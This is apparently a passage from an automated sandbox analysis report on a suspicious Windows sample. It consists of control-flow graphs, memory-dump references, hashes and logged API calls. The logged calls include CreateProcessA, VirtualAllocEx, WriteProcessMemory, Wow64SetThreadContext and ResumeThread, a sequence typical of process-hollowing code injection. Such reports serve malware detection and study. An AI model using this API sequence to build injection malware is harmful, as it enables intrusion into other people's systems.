                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0153D39B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0153D3D8
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0153D431
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2063062207-0
                                                                                                                            • Opcode ID: 6f14de84182d7c253bbbd6bc00a676209b3fe7b0edcb00dadc158706fddf1029
                                                                                                                            • Instruction ID: bcb4d4cd157d0ee16fb980a70c1690065a7aa5130184e1e23ee0b97e5ad08d5c
                                                                                                                            • Opcode Fuzzy Hash: 6f14de84182d7c253bbbd6bc00a676209b3fe7b0edcb00dadc158706fddf1029
                                                                                                                            • Instruction Fuzzy Hash: 585114B0D01649CFEB14CFAAD548BAEBBF1FF88314F208459E419AB350D7746984CB66

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1649 76f9267-76f92fd 1652 76f92ff-76f9309 1649->1652 1653 76f9336-76f9356 1649->1653 1652->1653 1654 76f930b-76f930d 1652->1654 1660 76f938f-76f93be 1653->1660 1661 76f9358-76f9362 1653->1661 1655 76f930f-76f9319 1654->1655 1656 76f9330-76f9333 1654->1656 1658 76f931d-76f932c 1655->1658 1659 76f931b 1655->1659 1656->1653 1658->1658 1662 76f932e 1658->1662 1659->1658 1667 76f93f7-76f94b1 CreateProcessA 1660->1667 1668 76f93c0-76f93ca 1660->1668 1661->1660 1663 76f9364-76f9366 1661->1663 1662->1656 1665 76f9389-76f938c 1663->1665 1666 76f9368-76f9372 1663->1666 1665->1660 1669 76f9376-76f9385 1666->1669 1670 76f9374 1666->1670 1681 76f94ba-76f9540 1667->1681 1682 76f94b3-76f94b9 1667->1682 1668->1667 1671 76f93cc-76f93ce 1668->1671 1669->1669 1672 76f9387 1669->1672 1670->1669 1673 76f93f1-76f93f4 1671->1673 1674 76f93d0-76f93da 1671->1674 1672->1665 1673->1667 1676 76f93de-76f93ed 1674->1676 1677 76f93dc 1674->1677 1676->1676 1678 76f93ef 1676->1678 1677->1676 1678->1673 1692 76f9542-76f9546 1681->1692 1693 76f9550-76f9554 1681->1693 1682->1681 1692->1693 1694 76f9548 1692->1694 1695 76f9556-76f955a 1693->1695 1696 76f9564-76f9568 1693->1696 1694->1693 1695->1696 1697 76f955c 1695->1697 1698 76f956a-76f956e 1696->1698 1699 76f9578-76f957c 1696->1699 1697->1696 1698->1699 1702 76f9570 1698->1702 1700 76f958e-76f9595 1699->1700 1701 76f957e-76f9584 1699->1701 1703 76f95ac 1700->1703 1704 76f9597-76f95a6 1700->1704 1701->1700 1702->1699 1706 76f95ad 1703->1706 1704->1703 1706->1706
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076F949E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 963392458-0
                                                                                                                            • Opcode ID: c120cc54709ec53d0f8fb38a35763eb897baf8b8731064b59f63d1188b77f90b
                                                                                                                            • Instruction ID: cbd5f23f5fed0328d8acec6020f2336f7e54c14d601a72cd4b83d291bc76e8ad
                                                                                                                            • Opcode Fuzzy Hash: c120cc54709ec53d0f8fb38a35763eb897baf8b8731064b59f63d1188b77f90b
                                                                                                                            • Instruction Fuzzy Hash: 4F914BB1D0031ACFEF24DF69C841BEDBBB2AB44314F148169E909E7280DB74A985CF91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1707 76f9268-76f92fd 1709 76f92ff-76f9309 1707->1709 1710 76f9336-76f9356 1707->1710 1709->1710 1711 76f930b-76f930d 1709->1711 1717 76f938f-76f93be 1710->1717 1718 76f9358-76f9362 1710->1718 1712 76f930f-76f9319 1711->1712 1713 76f9330-76f9333 1711->1713 1715 76f931d-76f932c 1712->1715 1716 76f931b 1712->1716 1713->1710 1715->1715 1719 76f932e 1715->1719 1716->1715 1724 76f93f7-76f94b1 CreateProcessA 1717->1724 1725 76f93c0-76f93ca 1717->1725 1718->1717 1720 76f9364-76f9366 1718->1720 1719->1713 1722 76f9389-76f938c 1720->1722 1723 76f9368-76f9372 1720->1723 1722->1717 1726 76f9376-76f9385 1723->1726 1727 76f9374 1723->1727 1738 76f94ba-76f9540 1724->1738 1739 76f94b3-76f94b9 1724->1739 1725->1724 1728 76f93cc-76f93ce 1725->1728 1726->1726 1729 76f9387 1726->1729 1727->1726 1730 76f93f1-76f93f4 1728->1730 1731 76f93d0-76f93da 1728->1731 1729->1722 1730->1724 1733 76f93de-76f93ed 1731->1733 1734 76f93dc 1731->1734 1733->1733 1735 76f93ef 1733->1735 1734->1733 1735->1730 1749 76f9542-76f9546 1738->1749 1750 76f9550-76f9554 1738->1750 1739->1738 1749->1750 1751 76f9548 1749->1751 1752 76f9556-76f955a 1750->1752 1753 76f9564-76f9568 1750->1753 1751->1750 1752->1753 1754 76f955c 1752->1754 1755 76f956a-76f956e 1753->1755 1756 76f9578-76f957c 1753->1756 1754->1753 1755->1756 1759 76f9570 1755->1759 1757 76f958e-76f9595 1756->1757 1758 76f957e-76f9584 1756->1758 1760 76f95ac 1757->1760 1761 76f9597-76f95a6 1757->1761 1758->1757 1759->1756 1763 76f95ad 1760->1763 1761->1760 1763->1763
                                                                                                                            APIs
                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076F949E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 963392458-0
                                                                                                                            • Opcode ID: 33cca05835c18d9894551b763a437bc072bd72e78723160b9c5ba0905ef6d606
                                                                                                                            • Instruction ID: dd81c329cfaac1a9127e12fab737e148cdee4527a710a5d87892ed1a43d3fdd6
                                                                                                                            • Opcode Fuzzy Hash: 33cca05835c18d9894551b763a437bc072bd72e78723160b9c5ba0905ef6d606
                                                                                                                            • Instruction Fuzzy Hash: 59914BB1D0031ACFEF24DF69C841BEDBBB2AB44314F148169E909E7280DB74A985CF91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1764 153b048-153b057 1765 153b083-153b087 1764->1765 1766 153b059-153b066 call 1539ab8 1764->1766 1767 153b09b-153b0dc 1765->1767 1768 153b089-153b093 1765->1768 1773 153b068-153b076 call 153b2e0 1766->1773 1774 153b07c 1766->1774 1775 153b0e9-153b0f7 1767->1775 1776 153b0de-153b0e6 1767->1776 1768->1767 1773->1774 1780 153b1b8-153b278 1773->1780 1774->1765 1778 153b11b-153b11d 1775->1778 1779 153b0f9-153b0fe 1775->1779 1776->1775 1781 153b120-153b127 1778->1781 1782 153b100-153b107 call 153ad00 1779->1782 1783 153b109 1779->1783 1815 153b280-153b2ab GetModuleHandleW 1780->1815 1816 153b27a-153b27d 1780->1816 1785 153b134-153b13b 1781->1785 1786 153b129-153b131 1781->1786 1784 153b10b-153b119 1782->1784 1783->1784 1784->1781 1789 153b148-153b151 call 153ad10 1785->1789 1790 153b13d-153b145 1785->1790 1786->1785 1795 153b153-153b15b 1789->1795 1796 153b15e-153b163 1789->1796 1790->1789 1795->1796 1797 153b181-153b185 1796->1797 1798 153b165-153b16c 1796->1798 1820 153b188 call 153b5e0 1797->1820 1821 153b188 call 153b5b0 1797->1821 1798->1797 1800 153b16e-153b17e call 153ad20 call 153ad30 1798->1800 1800->1797 1802 153b18b-153b18e 1805 153b1b1-153b1b7 1802->1805 1806 153b190-153b1ae 1802->1806 1806->1805 1817 153b2b4-153b2c8 1815->1817 1818 153b2ad-153b2b3 1815->1818 1816->1815 1818->1817 1820->1802 1821->1802
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0153B29E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: 2ebe4e365c92c63bf334f4a353405f1da9e61068e8ea412b4c5baa7e68b9d6da
                                                                                                                            • Instruction ID: 863ed10490c425d7d691564bd2297b31a246e43777f5b0df9eeafe1cf6e7c35c
                                                                                                                            • Opcode Fuzzy Hash: 2ebe4e365c92c63bf334f4a353405f1da9e61068e8ea412b4c5baa7e68b9d6da
                                                                                                                            • Instruction Fuzzy Hash: BD713770A00B058FEB24DF2AD45575ABBF1FF88204F008A2ED49ADBA50DB75E945CB91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1936 15344b4-15359b9 CreateActCtxA 1939 15359c2-1535a1c 1936->1939 1940 15359bb-15359c1 1936->1940 1947 1535a2b-1535a2f 1939->1947 1948 1535a1e-1535a21 1939->1948 1940->1939 1949 1535a31-1535a3d 1947->1949 1950 1535a40 1947->1950 1948->1947 1949->1950 1952 1535a41 1950->1952 1952->1952
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 015359A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 51f69d7b44e971fe4be72f69c9e81271f2f5a0859a1c733cd2c73e7cd60a899e
                                                                                                                            • Instruction ID: c92ad49ea21cdbc45540b9a476268f997e35b7e5c89012583bfccfd31ac5d9b4
                                                                                                                            • Opcode Fuzzy Hash: 51f69d7b44e971fe4be72f69c9e81271f2f5a0859a1c733cd2c73e7cd60a899e
                                                                                                                            • Instruction Fuzzy Hash: F841B171C10719CFEB24DFA9C84479DBBF6BF89304F20805AD409AB251EB756946CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1953 15358f3-15359b9 CreateActCtxA 1955 15359c2-1535a1c 1953->1955 1956 15359bb-15359c1 1953->1956 1963 1535a2b-1535a2f 1955->1963 1964 1535a1e-1535a21 1955->1964 1956->1955 1965 1535a31-1535a3d 1963->1965 1966 1535a40 1963->1966 1964->1963 1965->1966 1968 1535a41 1966->1968 1968->1968
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 015359A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: d658a5a7d9328528a0456e5de4054d3e32a2b9f0832b49c438441df571c5d2a0
                                                                                                                            • Instruction ID: 5d98c352c34a11b56cdbc87effc1f9b2e7dbafada0b344953079a6cfaa57cc9f
                                                                                                                            • Opcode Fuzzy Hash: d658a5a7d9328528a0456e5de4054d3e32a2b9f0832b49c438441df571c5d2a0
                                                                                                                            • Instruction Fuzzy Hash: CC41A271C10719CFEB28DFA9C84479DBBB6BF89304F24805AD409AB251E7756946CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1969 7480d88-7480d9a 1970 7480da2-7480dad 1969->1970 1979 7480d9d call 7480d78 1969->1979 1980 7480d9d call 7480d88 1969->1980 1971 7480daf-7480dbf 1970->1971 1972 7480dc2-7480e54 CreateIconFromResourceEx 1970->1972 1975 7480e5d-7480e7a 1972->1975 1976 7480e56-7480e5c 1972->1976 1976->1975 1979->1970 1980->1970
                                                                                                                            APIs
                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 07480E47
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3668623891-0
                                                                                                                            • Opcode ID: 7178a27fb75d0fb067170cdc9209b780a307ecfc67483b15b1cdb4ebe428bda6
                                                                                                                            • Instruction ID: 8a8693b1c489844edcac7e4f708e17924d8eb10b1abb2a668abc1e939418c801
                                                                                                                            • Opcode Fuzzy Hash: 7178a27fb75d0fb067170cdc9209b780a307ecfc67483b15b1cdb4ebe428bda6
                                                                                                                            • Instruction Fuzzy Hash: CF318A7290434D9FDB11DFA9D804AEEBFF8EF09310F14845AE954AB261C335A954DFA0
                                                                                                                            APIs
                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076F9070
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3559483778-0
                                                                                                                            • Opcode ID: 3a9bb5ae8cefe05cbad921b66f073cdd0a933bd4c07f51480a01e93de5cfc3a8
                                                                                                                            • Instruction ID: 558f6fbcdc503520a736a1c81d246f7e1514b0d0aa8f07c2b6d8efeb51fd2316
                                                                                                                            • Opcode Fuzzy Hash: 3a9bb5ae8cefe05cbad921b66f073cdd0a933bd4c07f51480a01e93de5cfc3a8
                                                                                                                            • Instruction Fuzzy Hash: 512137B59003499FDB10CFAAC885BEEBBF5FF48310F10842EE919A7251C779A544CBA5
                                                                                                                            APIs
                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076F8EC6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 983334009-0
                                                                                                                            • Opcode ID: 8d2ecae020542dcb3c36f0355c8d8ddbdfd3ef28b8c8c7003020099ab1b44669
                                                                                                                            • Instruction ID: 305822f15cb9f67857a4676d8748b0da77b9a3def1380cbe47cabd3cc5a5d132
                                                                                                                            • Opcode Fuzzy Hash: 8d2ecae020542dcb3c36f0355c8d8ddbdfd3ef28b8c8c7003020099ab1b44669
                                                                                                                            • Instruction Fuzzy Hash: 2B217AB1D003099FEB10CFAAC4847EFBBF5EF88214F148429D559A7341CB78A945CBA4
                                                                                                                            APIs
                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076F9070
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3559483778-0
                                                                                                                            • Opcode ID: c3ab41dcad6de977a889c6f890bcf1c74cd91a5e43fd99a786794d4c022b9d3d
                                                                                                                            • Instruction ID: 848fb53ffbe8f3f03c11bbaf3fb9e9cf9f9bf75779b6574c9bf6fb601a3e2524
                                                                                                                            • Opcode Fuzzy Hash: c3ab41dcad6de977a889c6f890bcf1c74cd91a5e43fd99a786794d4c022b9d3d
                                                                                                                            • Instruction Fuzzy Hash: 132126B19003499FDB14CFAAC881BDEBBF5FF48310F10842AE919A7340C779A940CBA5
                                                                                                                            APIs
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076F9150
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1726664587-0
                                                                                                                            • Opcode ID: 88f36bad0e30b7d8aa3b5dc282242dc2b1c69574c83ae61d29d22decacaf7c62
                                                                                                                            • Instruction ID: 4904b9d22cf09ff4acc2810f23c414a89e5751b6fbf66411756ca3718f910043
                                                                                                                            • Opcode Fuzzy Hash: 88f36bad0e30b7d8aa3b5dc282242dc2b1c69574c83ae61d29d22decacaf7c62
                                                                                                                            • Instruction Fuzzy Hash: AE212AB1C003499FDB10DFAAC844BEEBBF5FF48310F10842AE519A7250C779A544CBA5
                                                                                                                            APIs
                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 0748470F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FromMonitorPoint
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1566494148-0
                                                                                                                            • Opcode ID: a20c1661239fe4900c25458b18f5326fbffc5e3f95217b2ff7935303a6fcbd69
                                                                                                                            • Instruction ID: 5254255d36f80a282b228e9c8959a6632e5520e41ebfdcc12ee848be1aa68f6d
                                                                                                                            • Opcode Fuzzy Hash: a20c1661239fe4900c25458b18f5326fbffc5e3f95217b2ff7935303a6fcbd69
                                                                                                                            • Instruction Fuzzy Hash: 2A219AB99043899FCB11DFAAD4047EEBFF0FB49220F10845AD895BB241C3386A44CFA1
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153D5AF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 1f451a4b401bbec60363f0a9228bed33012b2001b5f363efc5202bc98f860c93
                                                                                                                            • Instruction ID: af586c6d6c248b4017a15ec07b868b3d45ebbe8dd4afffc9c988bc0f6dbda4fd
                                                                                                                            • Opcode Fuzzy Hash: 1f451a4b401bbec60363f0a9228bed33012b2001b5f363efc5202bc98f860c93
                                                                                                                            • Instruction Fuzzy Hash: 3B21E6B5D01248EFDB10CF9AD884ADEBBF8FB48310F14841AE918A7350D378A944CFA5
                                                                                                                            APIs
                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 0748470F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1317333847.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7480000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FromMonitorPoint
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1566494148-0
                                                                                                                            • Opcode ID: ffa0a22c2481708ae862f192c3c873c9a0133df8a600c3f6bf038cb8cb22901c
                                                                                                                            • Instruction ID: 089a436a11d1d60fc0d9b5f11c639c21a1053bd935a7d803cd7d7fb6f03f4058
                                                                                                                            • Opcode Fuzzy Hash: ffa0a22c2481708ae862f192c3c873c9a0133df8a600c3f6bf038cb8cb22901c
                                                                                                                            • Instruction Fuzzy Hash: 09217AB5A002499FDB10EF9AD404BEEFBF5FB49210F10841AE855BB380C7356944CFA1
                                                                                                                            APIs
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076F9150
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1726664587-0
                                                                                                                            • Opcode ID: a05acd191c181d9a5d13c63d69af463b76958d58d822be83cb25d5c1cd2b035f
                                                                                                                            • Instruction ID: f5803c6dd3496243a5dcde300f6ebb27eee0afe62c100379c2223ef0bdc1025d
                                                                                                                            • Opcode Fuzzy Hash: a05acd191c181d9a5d13c63d69af463b76958d58d822be83cb25d5c1cd2b035f
                                                                                                                            • Instruction Fuzzy Hash: AF21F8B1C003599FDB14DFAAC884BEEBBF5FF48310F10842AE959A7240C779A540DBA5
                                                                                                                            APIs
                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076F8F8E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 75c57b6226be28a5889a93d64d786af60c10a7d4a17a58a79ba4e2e232170dbb
                                                                                                                            • Instruction ID: ed77fb5702bfe1249291c45a70ba548f87be59fb7f223e93afac4c6b15bb9ceb
                                                                                                                            • Opcode Fuzzy Hash: 75c57b6226be28a5889a93d64d786af60c10a7d4a17a58a79ba4e2e232170dbb
                                                                                                                            • Instruction Fuzzy Hash: 4021BB728043899FDB20CFAAC801BEEBFF5EF48320F14845AE555A7240CB799540CBA1
                                                                                                                            APIs
                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076F8EC6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 983334009-0
                                                                                                                            • Opcode ID: e03c5599552cdb2b489b2567a430511684e09d1ddb6a201087afb03d8a0b5750
                                                                                                                            • Instruction ID: 9f25ba75bac3ae6c7ec7d78a5f9d3a8e79ef3588da3d09465e68c0f00a2def40
                                                                                                                            • Opcode Fuzzy Hash: e03c5599552cdb2b489b2567a430511684e09d1ddb6a201087afb03d8a0b5750
                                                                                                                            • Instruction Fuzzy Hash: B62138B1D003099FDB14DFAAC4847EEBBF4EF48210F14842AD519A7341CB78A945CFA5
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153D5AF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1306248046.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1530000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: c7022ff0dcb4726e1100a7bcb6d157bd11bfe047d977e430a8c66cdce6023233
                                                                                                                            • Instruction ID: 0033f6948d2977b33642373fe1f0c9cf92a1fd0b91832de6481b8e8b143c5c12
                                                                                                                            • Opcode Fuzzy Hash: c7022ff0dcb4726e1100a7bcb6d157bd11bfe047d977e430a8c66cdce6023233
                                                                                                                            • Instruction Fuzzy Hash: EC21E4B5D01248EFDB10CF9AD484ADEBBF4FB48310F14841AE914A7350D378A944CFA5
                                                                                                                            APIs
                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076F8F8E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: fdb7011e4c3c864f8b405fb365c1959b19c42823352752876300f8172dd18550
                                                                                                                            • Instruction ID: 584ddf8c26c5276ed4b196e704dbd926f7acda3b4d831d98a0ded07a87ae287a
                                                                                                                            • Opcode Fuzzy Hash: fdb7011e4c3c864f8b405fb365c1959b19c42823352752876300f8172dd18550
                                                                                                                            • Instruction Fuzzy Hash: 431126728003499FDB24DFAAC844BDEBBF5EF48320F14881AE515A7250CB75A540CBA5
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: c484a8d7fce4700c45b8c946bd2ca9db281441e9afbd4385549935fefc7cc3c3
                                                                                                                            • Instruction ID: b99f8f0430ab87681af05090f55e934dd103689ee29dc193c72f11329190df81
                                                                                                                            • Opcode Fuzzy Hash: c484a8d7fce4700c45b8c946bd2ca9db281441e9afbd4385549935fefc7cc3c3
                                                                                                                            • Instruction Fuzzy Hash: 2A1176B1C003498FDB24DFAAD4447EEFBF4EF48220F10881ED519A7640CA79A940CBA5
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 62b742c4e37e13b857e5b8509679e42cce5f42db30570a3f5970d3bb59cbfd71
                                                                                                                            • Instruction ID: 74ba6076c3ad8660283a8654e7495a74ed156662d051d2bc6e78139e35b3b336
                                                                                                                            • Opcode Fuzzy Hash: 62b742c4e37e13b857e5b8509679e42cce5f42db30570a3f5970d3bb59cbfd71
                                                                                                                            • Instruction Fuzzy Hash: 2A1128B1D003498FDB24DFAAC4447DEFBF5EF48210F14841AD519A7240CA79A540CB95
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 076FD12D
                                                                                                                            Memory Dump Source
